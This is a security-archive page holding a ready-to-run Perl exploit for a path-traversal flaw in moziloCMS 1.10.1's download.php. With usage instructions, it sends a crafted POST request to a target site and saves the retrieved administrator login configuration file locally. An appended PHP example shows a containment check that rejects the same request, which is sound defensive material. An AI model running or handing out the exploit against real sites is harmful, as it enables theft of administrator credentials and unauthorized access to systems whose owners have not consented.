moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

#!/usr/bin/perl
#
#   moziloCMS 1.10.1 Perl exploit
#
#   discovered & written by Ams
#   ax330d [doggy] gmail [dot] com
#
#   DESCRIPTION:
#   Vulnerability hides in "download.php", which we can use to download any file we want to.
#   Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open
#   not looking on that it is protected by .htaccess)
#   Script does not filter global params, it only checks whether local file exists...
#   (By the way, all downloads are logged to "/conf/downloads.conf")
#
#   USAGE:
#   Run exploit :perl expl.pl http://www.site.com
#
#   NEEDED:
#   magic_quotes_gpc = off
#

use strict;
use IO::Socket;

print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\n\t\t moziloCMS 1.10.1 exploit (by Ams)
\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";

if(@ARGV<1){
    die "\n\tUsage:\texpl.pl [host]\n\n
\n\tExample:\texpl.pl http://localhost/blog/\n\n";
}

my $expl_url = $ARGV[0];

print "\n\t[~] Starting exploit...\n";

if($expl_url =~ m#http://#) {
    exploit($expl_url);
} else {
    exploit('http://'.$expl_url);
}

sub exploit {

    # Defining vars.
    my $site = pop @_;
    my ($a, $b, $c, @d) = split /\//,$site;
    my $path = join('/',@d);
    my $host = $c;
    if($path) {$path = '/'.$path;}
    my ($length, $packet, $downloaded, $injection);

    # Revealing /data/sess.php.
    print "\n\t[~] Sending request to 'downloads.php'...\n";

    $injection = "file=hola&cat=../admin/conf/logindata.conf";
    $length = length($injection);
    $packet = "POST $path/download.php HTTP/1.1\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= "Connection: Close\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Content-Length: $length\r\n\r\n";
    $packet .= "$injection";

    $downloaded = send_surprise($host, $packet, 1);

    if($downloaded =~ /hackin/) {
        print "\n\t[-] Exploiting failed...\n";
    } elsif ($downloaded =~ /200 OK/) {

        # Parsing and saving received data.
        $downloaded =~ /\r\n\r\n/ ;
        $downloaded = $';

        open(DOWNL, ">hola.txt");
        print DOWNL $downloaded;
        close(DOWNL);

        print "\n\t[+] Looks like ok! Check hola.txt\n";
    } else {
        print "\n\t[-] Exploiting failed...\n";
    }
}

sub send_surprise() {

    my $dat = 1;
    my ($host, $packet, $ret) = @_;
    my $socket=IO::Socket::INET->new(
        Proto=>"tcp",
        PeerAddr=>$host,
        PeerPort=>"80"
    );

    if( ! $socket) {
        return 0;
    } else {
        print $socket $packet;
        if($ret) {
            my $rcv;
            while($rcv = <$socket>) {
                $dat .= $rcv;
            }
        }
        close ($socket);
        return $dat;
    }
}
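
The script's header says download.php uses the request parameters unfiltered and only checks that the local file exists. The PHP below is an added example of the missing containment check; it is not moziloCMS code and not from the exploit author. The function name resolve_download(), the one-folder-per-category layout and the sample files are assumptions made for the illustration.

```php
<?php
// Added example, not moziloCMS code: the layout (one folder per category under
// a download root) and the name resolve_download() are assumptions.
function resolve_download(string $root, string $cat, string $file): ?string
{
    // 1. Each parameter must name a single directory entry, never a path.
    foreach ([$cat, $file] as $part) {
        if ($part === '' || $part === '.' || $part === '..'
            || strpbrk($part, "/\\") !== false || strpos($part, "\0") !== false) {
            return null;
        }
    }
    // 2. Canonicalise, then require the result to stay under the root.
    //    realpath() resolves ".." and symlinks; false means "does not exist".
    $base = realpath($root);
    if ($base === false) {
        return null;
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $cat . DIRECTORY_SEPARATOR . $file);
    if ($target === false || !is_file($target)) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed sample tree: <tmp>/downloads/docs/manual.txt is public,
// <tmp>/admin/conf/logindata.conf must never be served.
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dl_demo_' . getmypid();
mkdir("$tmp/downloads/docs", 0700, true);
mkdir("$tmp/admin/conf", 0700, true);
file_put_contents("$tmp/downloads/docs/manual.txt", "public\n");
file_put_contents("$tmp/admin/conf/logindata.conf", "secret\n");

$requests = [
    ['docs', 'manual.txt'],                    // legitimate download
    ['../admin/conf/logindata.conf', 'hola'],  // parameters sent by the script above
    ['docs', 'missing.txt'],                   // file that does not exist
];
foreach ($requests as [$cat, $file]) {
    $path = resolve_download("$tmp/downloads", $cat, $file);
    printf("cat=%-30s file=%-12s => %s\n", $cat, $file, $path === null ? 'REJECTED' : 'serve');
}
```

The syntactic check stops the request before any filesystem call, and the realpath() prefix comparison additionally covers symlinks inside the download root that point outside it.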
